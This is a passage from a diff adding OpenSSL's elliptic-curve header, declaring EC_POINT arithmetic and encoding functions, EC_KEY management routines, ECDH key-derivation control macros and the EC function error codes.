+ *  \param  x      BIGNUM for the x-coordinate
+ *  \param  y      BIGNUM for the y-coordinate
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINT_get_affine_coordinates_GF2m(const EC_GROUP *group,
+                                         const EC_POINT *p, BIGNUM *x,
+                                         BIGNUM *y, BN_CTX *ctx);
+
+/** Sets the x9.62 compressed coordinates of a EC_POINT over GF2m
+ *  \param  group  underlying EC_GROUP object
+ *  \param  p      EC_POINT object
+ *  \param  x      BIGNUM with x-coordinate
+ *  \param  y_bit  integer with the y-Bit (either 0 or 1)
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINT_set_compressed_coordinates_GF2m(const EC_GROUP *group,
+                                             EC_POINT *p, const BIGNUM *x,
+                                             int y_bit, BN_CTX *ctx);
+# endif
+/** Encodes a EC_POINT object to a octet string
+ *  \param  group  underlying EC_GROUP object
+ *  \param  p      EC_POINT object
+ *  \param  form   point conversion form
+ *  \param  buf    memory buffer for the result. If NULL the function returns
+ *                 required buffer size.
+ *  \param  len    length of the memory buffer
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return the length of the encoded octet string or 0 if an error occurred
+ */
+size_t EC_POINT_point2oct(const EC_GROUP *group, const EC_POINT *p,
+                          point_conversion_form_t form,
+                          unsigned char *buf, size_t len, BN_CTX *ctx);
+
+/** Decodes a EC_POINT from a octet string
+ *  \param  group  underlying EC_GROUP object
+ *  \param  p      EC_POINT object
+ *  \param  buf    memory buffer with the encoded ec point
+ *  \param  len    length of the encoded ec point
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINT_oct2point(const EC_GROUP *group, EC_POINT *p,
+                       const unsigned char *buf, size_t len, BN_CTX *ctx);
+
+/* other interfaces to point2oct/oct2point: */
+BIGNUM *EC_POINT_point2bn(const EC_GROUP *, const EC_POINT *,
+                          point_conversion_form_t form, BIGNUM *, BN_CTX *);
+EC_POINT *EC_POINT_bn2point(const EC_GROUP *, const BIGNUM *,
+                            EC_POINT *, BN_CTX *);
+char *EC_POINT_point2hex(const EC_GROUP *, const EC_POINT *,
+                         point_conversion_form_t form, BN_CTX *);
+EC_POINT *EC_POINT_hex2point(const EC_GROUP *, const char *,
+                             EC_POINT *, BN_CTX *);
+
+/********************************************************************/
+/*         functions for doing EC_POINT arithmetic                  */
+/********************************************************************/
+
+/** Computes the sum of two EC_POINT
+ *  \param  group  underlying EC_GROUP object
+ *  \param  r      EC_POINT object for the result (r = a + b)
+ *  \param  a      EC_POINT object with the first summand
+ *  \param  b      EC_POINT object with the second summand
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINT_add(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a,
+                 const EC_POINT *b, BN_CTX *ctx);
+
+/** Computes the double of a EC_POINT
+ *  \param  group  underlying EC_GROUP object
+ *  \param  r      EC_POINT object for the result (r = 2 * a)
+ *  \param  a      EC_POINT object
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINT_dbl(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a,
+                 BN_CTX *ctx);
+
+/** Computes the inverse of a EC_POINT
+ *  \param  group  underlying EC_GROUP object
+ *  \param  a      EC_POINT object to be inverted (it's used for the result as well)
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINT_invert(const EC_GROUP *group, EC_POINT *a, BN_CTX *ctx);
+
+/** Checks whether the point is the neutral element of the group
+ *  \param  group  the underlying EC_GROUP object
+ *  \param  p      EC_POINT object
+ *  \return 1 if the point is the neutral element and 0 otherwise
+ */
+int EC_POINT_is_at_infinity(const EC_GROUP *group, const EC_POINT *p);
+
+/** Checks whether the point is on the curve
+ *  \param  group  underlying EC_GROUP object
+ *  \param  point  EC_POINT object to check
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 if point if on the curve and 0 otherwise
+ */
+int EC_POINT_is_on_curve(const EC_GROUP *group, const EC_POINT *point,
+                         BN_CTX *ctx);
+
+/** Compares two EC_POINTs
+ *  \param  group  underlying EC_GROUP object
+ *  \param  a      first EC_POINT object
+ *  \param  b      second EC_POINT object
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 0 if both points are equal and a value != 0 otherwise
+ */
+int EC_POINT_cmp(const EC_GROUP *group, const EC_POINT *a, const EC_POINT *b,
+                 BN_CTX *ctx);
+
+int EC_POINT_make_affine(const EC_GROUP *group, EC_POINT *point, BN_CTX *ctx);
+int EC_POINTs_make_affine(const EC_GROUP *group, size_t num,
+                          EC_POINT *points[], BN_CTX *ctx);
+
+/** Computes r = generator * n sum_{i=0}^{num-1} p[i] * m[i]
+ *  \param  group  underlying EC_GROUP object
+ *  \param  r      EC_POINT object for the result
+ *  \param  n      BIGNUM with the multiplier for the group generator (optional)
+ *  \param  num    number futher summands
+ *  \param  p      array of size num of EC_POINT objects
+ *  \param  m      array of size num of BIGNUM objects
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINTs_mul(const EC_GROUP *group, EC_POINT *r, const BIGNUM *n,
+                  size_t num, const EC_POINT *p[], const BIGNUM *m[],
+                  BN_CTX *ctx);
+
+/** Computes r = generator * n + q * m
+ *  \param  group  underlying EC_GROUP object
+ *  \param  r      EC_POINT object for the result
+ *  \param  n      BIGNUM with the multiplier for the group generator (optional)
+ *  \param  q      EC_POINT object with the first factor of the second summand
+ *  \param  m      BIGNUM with the second factor of the second summand
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_POINT_mul(const EC_GROUP *group, EC_POINT *r, const BIGNUM *n,
+                 const EC_POINT *q, const BIGNUM *m, BN_CTX *ctx);
+
+/** Stores multiples of generator for faster point multiplication
+ *  \param  group  EC_GROUP object
+ *  \param  ctx    BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occured
+ */
+int EC_GROUP_precompute_mult(EC_GROUP *group, BN_CTX *ctx);
+
+/** Reports whether a precomputation has been done
+ *  \param  group  EC_GROUP object
+ *  \return 1 if a pre-computation has been done and 0 otherwise
+ */
+int EC_GROUP_have_precompute_mult(const EC_GROUP *group);
+
+/********************************************************************/
+/*                       ASN1 stuff                                 */
+/********************************************************************/
+
+/*
+ * EC_GROUP_get_basis_type() returns the NID of the basis type used to
+ * represent the field elements
+ */
+int EC_GROUP_get_basis_type(const EC_GROUP *);
+# ifndef OPENSSL_NO_EC2M
+int EC_GROUP_get_trinomial_basis(const EC_GROUP *, unsigned int *k);
+int EC_GROUP_get_pentanomial_basis(const EC_GROUP *, unsigned int *k1,
+                                   unsigned int *k2, unsigned int *k3);
+# endif
+
+# define OPENSSL_EC_NAMED_CURVE  0x001
+
+typedef struct ecpk_parameters_st ECPKPARAMETERS;
+
+EC_GROUP *d2i_ECPKParameters(EC_GROUP **, const unsigned char **in, long len);
+int i2d_ECPKParameters(const EC_GROUP *, unsigned char **out);
+
+# define d2i_ECPKParameters_bio(bp,x) ASN1_d2i_bio_of(EC_GROUP,NULL,d2i_ECPKParameters,bp,x)
+# define i2d_ECPKParameters_bio(bp,x) ASN1_i2d_bio_of_const(EC_GROUP,i2d_ECPKParameters,bp,x)
+# define d2i_ECPKParameters_fp(fp,x) (EC_GROUP *)ASN1_d2i_fp(NULL, \
+                (char *(*)())d2i_ECPKParameters,(fp),(unsigned char **)(x))
+# define i2d_ECPKParameters_fp(fp,x) ASN1_i2d_fp(i2d_ECPKParameters,(fp), \
+                (unsigned char *)(x))
+
+# ifndef OPENSSL_NO_BIO
+int ECPKParameters_print(BIO *bp, const EC_GROUP *x, int off);
+# endif
+# ifndef OPENSSL_NO_FP_API
+int ECPKParameters_print_fp(FILE *fp, const EC_GROUP *x, int off);
+# endif
+
+/********************************************************************/
+/*                      EC_KEY functions                            */
+/********************************************************************/
+
+typedef struct ec_key_st EC_KEY;
+
+/* some values for the encoding_flag */
+# define EC_PKEY_NO_PARAMETERS   0x001
+# define EC_PKEY_NO_PUBKEY       0x002
+
+/* some values for the flags field */
+# define EC_FLAG_NON_FIPS_ALLOW  0x1
+# define EC_FLAG_FIPS_CHECKED    0x2
+
+/** Creates a new EC_KEY object.
+ *  \return EC_KEY object or NULL if an error occurred.
+ */
+EC_KEY *EC_KEY_new(void);
+
+int EC_KEY_get_flags(const EC_KEY *key);
+
+void EC_KEY_set_flags(EC_KEY *key, int flags);
+
+void EC_KEY_clear_flags(EC_KEY *key, int flags);
+
+/** Creates a new EC_KEY object using a named curve as underlying
+ *  EC_GROUP object.
+ *  \param  nid  NID of the named curve.
+ *  \return EC_KEY object or NULL if an error occurred.
+ */
+EC_KEY *EC_KEY_new_by_curve_name(int nid);
+
+/** Frees a EC_KEY object.
+ *  \param  key  EC_KEY object to be freed.
+ */
+void EC_KEY_free(EC_KEY *key);
+
+/** Copies a EC_KEY object.
+ *  \param  dst  destination EC_KEY object
+ *  \param  src  src EC_KEY object
+ *  \return dst or NULL if an error occurred.
+ */
+EC_KEY *EC_KEY_copy(EC_KEY *dst, const EC_KEY *src);
+
+/** Creates a new EC_KEY object and copies the content from src to it.
+ *  \param  src  the source EC_KEY object
+ *  \return newly created EC_KEY object or NULL if an error occurred.
+ */
+EC_KEY *EC_KEY_dup(const EC_KEY *src);
+
+/** Increases the internal reference count of a EC_KEY object.
+ *  \param  key  EC_KEY object
+ *  \return 1 on success and 0 if an error occurred.
+ */
+int EC_KEY_up_ref(EC_KEY *key);
+
+/** Returns the EC_GROUP object of a EC_KEY object
+ *  \param  key  EC_KEY object
+ *  \return the EC_GROUP object (possibly NULL).
+ */
+const EC_GROUP *EC_KEY_get0_group(const EC_KEY *key);
+
+/** Sets the EC_GROUP of a EC_KEY object.
+ *  \param  key    EC_KEY object
+ *  \param  group  EC_GROUP to use in the EC_KEY object (note: the EC_KEY
+ *                 object will use an own copy of the EC_GROUP).
+ *  \return 1 on success and 0 if an error occurred.
+ */
+int EC_KEY_set_group(EC_KEY *key, const EC_GROUP *group);
+
+/** Returns the private key of a EC_KEY object.
+ *  \param  key  EC_KEY object
+ *  \return a BIGNUM with the private key (possibly NULL).
+ */
+const BIGNUM *EC_KEY_get0_private_key(const EC_KEY *key);
+
+/** Sets the private key of a EC_KEY object.
+ *  \param  key  EC_KEY object
+ *  \param  prv  BIGNUM with the private key (note: the EC_KEY object
+ *               will use an own copy of the BIGNUM).
+ *  \return 1 on success and 0 if an error occurred.
+ */
+int EC_KEY_set_private_key(EC_KEY *key, const BIGNUM *prv);
+
+/** Returns the public key of a EC_KEY object.
+ *  \param  key  the EC_KEY object
+ *  \return a EC_POINT object with the public key (possibly NULL)
+ */
+const EC_POINT *EC_KEY_get0_public_key(const EC_KEY *key);
+
+/** Sets the public key of a EC_KEY object.
+ *  \param  key  EC_KEY object
+ *  \param  pub  EC_POINT object with the public key (note: the EC_KEY object
+ *               will use an own copy of the EC_POINT object).
+ *  \return 1 on success and 0 if an error occurred.
+ */
+int EC_KEY_set_public_key(EC_KEY *key, const EC_POINT *pub);
+
+unsigned EC_KEY_get_enc_flags(const EC_KEY *key);
+void EC_KEY_set_enc_flags(EC_KEY *eckey, unsigned int flags);
+point_conversion_form_t EC_KEY_get_conv_form(const EC_KEY *key);
+void EC_KEY_set_conv_form(EC_KEY *eckey, point_conversion_form_t cform);
+/* functions to set/get method specific data  */
+void *EC_KEY_get_key_method_data(EC_KEY *key,
+                                 void *(*dup_func) (void *),
+                                 void (*free_func) (void *),
+                                 void (*clear_free_func) (void *));
+/** Sets the key method data of an EC_KEY object, if none has yet been set.
+ *  \param  key              EC_KEY object
+ *  \param  data             opaque data to install.
+ *  \param  dup_func         a function that duplicates |data|.
+ *  \param  free_func        a function that frees |data|.
+ *  \param  clear_free_func  a function that wipes and frees |data|.
+ *  \return the previously set data pointer, or NULL if |data| was inserted.
+ */
+void *EC_KEY_insert_key_method_data(EC_KEY *key, void *data,
+                                    void *(*dup_func) (void *),
+                                    void (*free_func) (void *),
+                                    void (*clear_free_func) (void *));
+/* wrapper functions for the underlying EC_GROUP object */
+void EC_KEY_set_asn1_flag(EC_KEY *eckey, int asn1_flag);
+
+/** Creates a table of pre-computed multiples of the generator to
+ *  accelerate further EC_KEY operations.
+ *  \param  key  EC_KEY object
+ *  \param  ctx  BN_CTX object (optional)
+ *  \return 1 on success and 0 if an error occurred.
+ */
+int EC_KEY_precompute_mult(EC_KEY *key, BN_CTX *ctx);
+
+/** Creates a new ec private (and optional a new public) key.
+ *  \param  key  EC_KEY object
+ *  \return 1 on success and 0 if an error occurred.
+ */
+int EC_KEY_generate_key(EC_KEY *key);
+
+/** Verifies that a private and/or public key is valid.
+ *  \param  key  the EC_KEY object
+ *  \return 1 on success and 0 otherwise.
+ */
+int EC_KEY_check_key(const EC_KEY *key);
+
+/** Sets a public key from affine coordindates performing
+ *  neccessary NIST PKV tests.
+ *  \param  key  the EC_KEY object
+ *  \param  x    public key x coordinate
+ *  \param  y    public key y coordinate
+ *  \return 1 on success and 0 otherwise.
+ */
+int EC_KEY_set_public_key_affine_coordinates(EC_KEY *key, BIGNUM *x,
+                                             BIGNUM *y);
+
+/********************************************************************/
+/*        de- and encoding functions for SEC1 ECPrivateKey          */
+/********************************************************************/
+
+/** Decodes a private key from a memory buffer.
+ *  \param  key  a pointer to a EC_KEY object which should be used (or NULL)
+ *  \param  in   pointer to memory with the DER encoded private key
+ *  \param  len  length of the DER encoded private key
+ *  \return the decoded private key or NULL if an error occurred.
+ */
+EC_KEY *d2i_ECPrivateKey(EC_KEY **key, const unsigned char **in, long len);
+
+/** Encodes a private key object and stores the result in a buffer.
+ *  \param  key  the EC_KEY object to encode
+ *  \param  out  the buffer for the result (if NULL the function returns number
+ *               of bytes needed).
+ *  \return 1 on success and 0 if an error occurred.
+ */
+int i2d_ECPrivateKey(EC_KEY *key, unsigned char **out);
+
+/********************************************************************/
+/*        de- and encoding functions for EC parameters              */
+/********************************************************************/
+
+/** Decodes ec parameter from a memory buffer.
+ *  \param  key  a pointer to a EC_KEY object which should be used (or NULL)
+ *  \param  in   pointer to memory with the DER encoded ec parameters
+ *  \param  len  length of the DER encoded ec parameters
+ *  \return a EC_KEY object with the decoded parameters or NULL if an error
+ *          occurred.
+ */
+EC_KEY *d2i_ECParameters(EC_KEY **key, const unsigned char **in, long len);
+
+/** Encodes ec parameter and stores the result in a buffer.
+ *  \param  key  the EC_KEY object with ec paramters to encode
+ *  \param  out  the buffer for the result (if NULL the function returns number
+ *               of bytes needed).
+ *  \return 1 on success and 0 if an error occurred.
+ */
+int i2d_ECParameters(EC_KEY *key, unsigned char **out);
+
+/********************************************************************/
+/*         de- and encoding functions for EC public key             */
+/*         (octet string, not DER -- hence 'o2i' and 'i2o')         */
+/********************************************************************/
+
+/** Decodes a ec public key from a octet string.
+ *  \param  key  a pointer to a EC_KEY object which should be used
+ *  \param  in   memory buffer with the encoded public key
+ *  \param  len  length of the encoded public key
+ *  \return EC_KEY object with decoded public key or NULL if an error
+ *          occurred.
+ */
+EC_KEY *o2i_ECPublicKey(EC_KEY **key, const unsigned char **in, long len);
+
+/** Encodes a ec public key in an octet string.
+ *  \param  key  the EC_KEY object with the public key
+ *  \param  out  the buffer for the result (if NULL the function returns number
+ *               of bytes needed).
+ *  \return 1 on success and 0 if an error occurred
+ */
+int i2o_ECPublicKey(EC_KEY *key, unsigned char **out);
+
+# ifndef OPENSSL_NO_BIO
+/** Prints out the ec parameters on human readable form.
+ *  \param  bp   BIO object to which the information is printed
+ *  \param  key  EC_KEY object
+ *  \return 1 on success and 0 if an error occurred
+ */
+int ECParameters_print(BIO *bp, const EC_KEY *key);
+
+/** Prints out the contents of a EC_KEY object
+ *  \param  bp   BIO object to which the information is printed
+ *  \param  key  EC_KEY object
+ *  \param  off  line offset
+ *  \return 1 on success and 0 if an error occurred
+ */
+int EC_KEY_print(BIO *bp, const EC_KEY *key, int off);
+
+# endif
+# ifndef OPENSSL_NO_FP_API
+/** Prints out the ec parameters on human readable form.
+ *  \param  fp   file descriptor to which the information is printed
+ *  \param  key  EC_KEY object
+ *  \return 1 on success and 0 if an error occurred
+ */
+int ECParameters_print_fp(FILE *fp, const EC_KEY *key);
+
+/** Prints out the contents of a EC_KEY object
+ *  \param  fp   file descriptor to which the information is printed
+ *  \param  key  EC_KEY object
+ *  \param  off  line offset
+ *  \return 1 on success and 0 if an error occurred
+ */
+int EC_KEY_print_fp(FILE *fp, const EC_KEY *key, int off);
+
+# endif
+
+# define ECParameters_dup(x) ASN1_dup_of(EC_KEY,i2d_ECParameters,d2i_ECParameters,x)
+
+# ifndef __cplusplus
+#  if defined(__SUNPRO_C)
+#   if __SUNPRO_C >= 0x520
+#    pragma error_messages (default,E_ARRAY_OF_INCOMPLETE_NONAME,E_ARRAY_OF_INCOMPLETE)
+#   endif
+#  endif
+# endif
+
+# define EVP_PKEY_CTX_set_ec_paramgen_curve_nid(ctx, nid) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_EC, \
+                                EVP_PKEY_OP_PARAMGEN|EVP_PKEY_OP_KEYGEN, \
+                                EVP_PKEY_CTRL_EC_PARAMGEN_CURVE_NID, nid, NULL)
+
+# define EVP_PKEY_CTX_set_ec_param_enc(ctx, flag) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_EC, \
+                                EVP_PKEY_OP_PARAMGEN|EVP_PKEY_OP_KEYGEN, \
+                                EVP_PKEY_CTRL_EC_PARAM_ENC, flag, NULL)
+
+# define EVP_PKEY_CTX_set_ecdh_cofactor_mode(ctx, flag) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_EC, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_EC_ECDH_COFACTOR, flag, NULL)
+
+# define EVP_PKEY_CTX_get_ecdh_cofactor_mode(ctx) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_EC, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_EC_ECDH_COFACTOR, -2, NULL)
+
+# define EVP_PKEY_CTX_set_ecdh_kdf_type(ctx, kdf) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_EC, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_EC_KDF_TYPE, kdf, NULL)
+
+# define EVP_PKEY_CTX_get_ecdh_kdf_type(ctx) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_EC, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_EC_KDF_TYPE, -2, NULL)
+
+# define EVP_PKEY_CTX_set_ecdh_kdf_md(ctx, md) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_EC, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_EC_KDF_MD, 0, (void *)md)
+
+# define EVP_PKEY_CTX_get_ecdh_kdf_md(ctx, pmd) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_EC, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_GET_EC_KDF_MD, 0, (void *)pmd)
+
+# define EVP_PKEY_CTX_set_ecdh_kdf_outlen(ctx, len) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_EC, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_EC_KDF_OUTLEN, len, NULL)
+
+# define EVP_PKEY_CTX_get_ecdh_kdf_outlen(ctx, plen) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_EC, \
+                                EVP_PKEY_OP_DERIVE, \
+                        EVP_PKEY_CTRL_GET_EC_KDF_OUTLEN, 0, (void *)plen)
+
+# define EVP_PKEY_CTX_set0_ecdh_kdf_ukm(ctx, p, plen) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_EC, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_EC_KDF_UKM, plen, (void *)p)
+
+# define EVP_PKEY_CTX_get0_ecdh_kdf_ukm(ctx, p) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_EC, \
+                                EVP_PKEY_OP_DERIVE, \
+                                EVP_PKEY_CTRL_GET_EC_KDF_UKM, 0, (void *)p)
+
+# define EVP_PKEY_CTRL_EC_PARAMGEN_CURVE_NID             (EVP_PKEY_ALG_CTRL + 1)
+# define EVP_PKEY_CTRL_EC_PARAM_ENC                      (EVP_PKEY_ALG_CTRL + 2)
+# define EVP_PKEY_CTRL_EC_ECDH_COFACTOR                  (EVP_PKEY_ALG_CTRL + 3)
+# define EVP_PKEY_CTRL_EC_KDF_TYPE                       (EVP_PKEY_ALG_CTRL + 4)
+# define EVP_PKEY_CTRL_EC_KDF_MD                         (EVP_PKEY_ALG_CTRL + 5)
+# define EVP_PKEY_CTRL_GET_EC_KDF_MD                     (EVP_PKEY_ALG_CTRL + 6)
+# define EVP_PKEY_CTRL_EC_KDF_OUTLEN                     (EVP_PKEY_ALG_CTRL + 7)
+# define EVP_PKEY_CTRL_GET_EC_KDF_OUTLEN                 (EVP_PKEY_ALG_CTRL + 8)
+# define EVP_PKEY_CTRL_EC_KDF_UKM                        (EVP_PKEY_ALG_CTRL + 9)
+# define EVP_PKEY_CTRL_GET_EC_KDF_UKM                    (EVP_PKEY_ALG_CTRL + 10)
+/* KDF types */
+# define EVP_PKEY_ECDH_KDF_NONE                          1
+# define EVP_PKEY_ECDH_KDF_X9_62                         2
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_EC_strings(void);
+
+/* Error codes for the EC functions. */
+
+/* Function codes. */
+# define EC_F_BN_TO_FELEM                                 224
+# define EC_F_COMPUTE_WNAF                                143
+# define EC_F_D2I_ECPARAMETERS                            144
+# define EC_F_D2I_ECPKPARAMETERS                          145
+# define EC_F_D2I_ECPRIVATEKEY                            146
+# define EC_F_DO_EC_KEY_PRINT                             221
+# define EC_F_ECDH_CMS_DECRYPT                            238
+# define EC_F_ECDH_CMS_SET_SHARED_INFO                    239
+# define EC_F_ECKEY_PARAM2TYPE                            223
+# define EC_F_ECKEY_PARAM_DECODE                          212
+# define EC_F_ECKEY_PRIV_DECODE                           213
+# define EC_F_ECKEY_PRIV_ENCODE                           214
+# define EC_F_ECKEY_PUB_DECODE                            215
+# define EC_F_ECKEY_PUB_ENCODE                            216
+# define EC_F_ECKEY_TYPE2PARAM                            220
+# define EC_F_ECPARAMETERS_PRINT                          147
+# define EC_F_ECPARAMETERS_PRINT_FP                       148
+# define EC_F_ECPKPARAMETERS_PRINT                        149
+# define EC_F_ECPKPARAMETERS_PRINT_FP                     150
+# define EC_F_ECP_NIST_MOD_192                            203
+# define EC_F_ECP_NIST_MOD_224                            204
+# define EC_F_ECP_NIST_MOD_256                            205
+# define EC_F_ECP_NIST_MOD_521                            206
+# define EC_F_EC_ASN1_GROUP2CURVE                         153
+# define EC_F_EC_ASN1_GROUP2FIELDID                       154
+# define EC_F_EC_ASN1_GROUP2PARAMETERS                    155
+# define EC_F_EC_ASN1_GROUP2PKPARAMETERS                  156
+# define EC_F_EC_ASN1_PARAMETERS2GROUP                    157
+# define EC_F_EC_ASN1_PKPARAMETERS2GROUP                  158
+# define EC_F_EC_EX_DATA_SET_DATA                         211
+# define EC_F_EC_GF2M_MONTGOMERY_POINT_MULTIPLY           208
+# define EC_F_EC_GF2M_SIMPLE_GROUP_CHECK_DISCRIMINANT     159
+# define EC_F_EC_GF2M_SIMPLE_GROUP_SET_CURVE              195
+# define EC_F_EC_GF2M_SIMPLE_OCT2POINT                    160
+# define EC_F_EC_GF2M_SIMPLE_POINT2OCT                    161
+# define EC_F_EC_GF2M_SIMPLE_POINT_GET_AFFINE_COORDINATES 162
+# define EC_F_EC_GF2M_SIMPLE_POINT_SET_AFFINE_COORDINATES 163
+# define EC_F_EC_GF2M_SIMPLE_SET_COMPRESSED_COORDINATES   164
+# define EC_F_EC_GFP_MONT_FIELD_DECODE                    133
+# define EC_F_EC_GFP_MONT_FIELD_ENCODE                    134
+# define EC_F_EC_GFP_MONT_FIELD_MUL                       131
+# define EC_F_EC_GFP_MONT_FIELD_SET_TO_ONE                209
+# define EC_F_EC_GFP_MONT_FIELD_SQR                       132
+# define EC_F_EC_GFP_MONT_GROUP_SET_CURVE                 189
+# define EC_F_EC_GFP_MONT_GROUP_SET_CURVE_GFP             135
+# define EC_F_EC_GFP_NISTP224_GROUP_SET_CURVE             225
+# define EC_F_EC_GFP_NISTP224_POINTS_MUL                  228
+# define EC_F_EC_GFP_NISTP224_POINT_GET_AFFINE_COORDINATES 226
+# define EC_F_EC_GFP_NISTP256_GROUP_SET_CURVE             230
+# define EC_F_EC_GFP_NISTP256_POINTS_MUL                  231
+# define EC_F_EC_GFP_NISTP256_POINT_GET_AFFINE_COORDINATES 232
+# define EC_F_EC_GFP_NISTP521_GROUP_SET_CURVE             233
+# define EC_F_EC_GFP_NISTP521_POINTS_MUL                  234
+# define EC_F_EC_GFP_NISTP521_POINT_GET_AFFINE_COORDINATES 235
+# define EC_F_EC_GFP_NIST_FIELD_MUL                       200
+# define EC_F_EC_GFP_NIST_FIELD_SQR                       201
+# define EC_F_EC_GFP_NIST_GROUP_SET_CURVE                 202
+# define EC_F_EC_GFP_SIMPLE_GROUP_CHECK_DISCRIMINANT      165
+# define EC_F_EC_GFP_SIMPLE_GROUP_SET_CURVE               166
+# define EC_F_EC_GFP_SIMPLE_GROUP_SET_CURVE_GFP           100
+# define EC_F_EC_GFP_SIMPLE_GROUP_SET_GENERATOR           101
+# define EC_F_EC_GFP_SIMPLE_MAKE_AFFINE                   102
+# define EC_F_EC_GFP_SIMPLE_OCT2POINT                     103
+# define EC_F_EC_GFP_SIMPLE_POINT2OCT                     104
+# define EC_F_EC_GFP_SIMPLE_POINTS_MAKE_AFFINE            137
+# define EC_F_EC_GFP_SIMPLE_POINT_GET_AFFINE_COORDINATES  167
+# define EC_F_EC_GFP_SIMPLE_POINT_GET_AFFINE_COORDINATES_GFP 105
+# define EC_F_EC_GFP_SIMPLE_POINT_SET_AFFINE_COORDINATES  168
+# define EC_F_EC_GFP_SIMPLE_POINT_SET_AFFINE_COORDINATES_GFP 128
+# define EC_F_EC_GFP_SIMPLE_SET_COMPRESSED_COORDINATES    169
+# define EC_F_EC_GFP_SIMPLE_SET_COMPRESSED_COORDINATES_GFP 129
+# define EC_F_EC_GROUP_CHECK                              170
+# define EC_F_EC_GROUP_CHECK_DISCRIMINANT                 171
+# define EC_F_EC_GROUP_COPY                               106
+# define EC_F_EC_GROUP_GET0_GENERATOR                     139
+# define EC_F_EC_GROUP_GET_COFACTOR                       140
+# define EC_F_EC_GROUP_GET_CURVE_GF2M                     172
+# define EC_F_EC_GROUP_GET_CURVE_GFP                      130
+# define EC_F_EC_GROUP_GET_DEGREE                         173
+# define EC_F_EC_GROUP_GET_ORDER                          141
+# define EC_F_EC_GROUP_GET_PENTANOMIAL_BASIS              193
+# define EC_F_EC_GROUP_GET_TRINOMIAL_BASIS                194
+# define EC_F_EC_GROUP_NEW                                108
+# define EC_F_EC_GROUP_NEW_BY_CURVE_NAME                  174
+# define EC_F_EC_GROUP_NEW_FROM_DATA                      175
+# define EC_F_EC_GROUP_PRECOMPUTE_MULT                    142
+# define EC_F_EC_GROUP_SET_CURVE_GF2M                     176
+# define EC_F_EC_GROUP_SET_CURVE_GFP                      109
+# define EC_F_EC_GROUP_SET_EXTRA_DATA                     110
+# define EC_F_EC_GROUP_SET_GENERATOR                      111
+# define EC_F_EC_KEY_CHECK_KEY                            177
+# define EC_F_EC_KEY_COPY                                 178
+# define EC_F_EC_KEY_GENERATE_KEY                         179
+# define EC_F_EC_KEY_NEW                                  182
+# define EC_F_EC_KEY_PRINT                                180
+# define EC_F_EC_KEY_PRINT_FP                             181
+# define EC_F_EC_KEY_SET_PUBLIC_KEY_AFFINE_COORDINATES    229
+# define EC_F_EC_POINTS_MAKE_AFFINE                       136
+# define EC_F_EC_POINT_ADD                                112
+# define EC_F_EC_POINT_CMP                                113
+# define EC_F_EC_POINT_COPY                               114
+# define EC_F_EC_POINT_DBL                                115
+# define EC_F_EC_POINT_GET_AFFINE_COORDINATES_GF2M        183
+# define EC_F_EC_POINT_GET_AFFINE_COORDINATES_GFP         116
+# define EC_F_EC_POINT_GET_JPROJECTIVE_COORDINATES_GFP    117
+# define EC_F_EC_POINT_INVERT                             210
+# define EC_F_EC_POINT_IS_AT_INFINITY                     118
+# define EC_F_EC_POINT_IS_ON_CURVE                        119
+# define EC_F_EC_POINT_MAKE_AFFINE                        120
+# define EC_F_EC_POINT_MUL                                184
+# define EC_F_EC_POINT_NEW                                121
+# define EC_F_EC_POINT_OCT2POINT                          122
+# define EC_F_EC_POINT_POINT2OCT                          123
+# define EC_F_EC_POINT_SET_AFFINE_COORDINATES_GF2M        185
+# define EC_F_EC_POINT_SET_AFFINE_COORDINATES_GFP         124
+# define EC_F_EC_POINT_SET_COMPRESSED_COORDINATES_GF2M    186
+# define EC_F_EC_POINT_SET_COMPRESSED_COORDINATES_GFP     125
+# define EC_F_EC_POINT_SET_JPROJECTIVE_COORDINATES_GFP    126
+# define EC_F_EC_POINT_SET_TO_INFINITY                    127
+# define EC_F_EC_PRE_COMP_DUP                             207
+# define EC_F_EC_PRE_COMP_NEW                             196
+# define EC_F_EC_WNAF_MUL                                 187
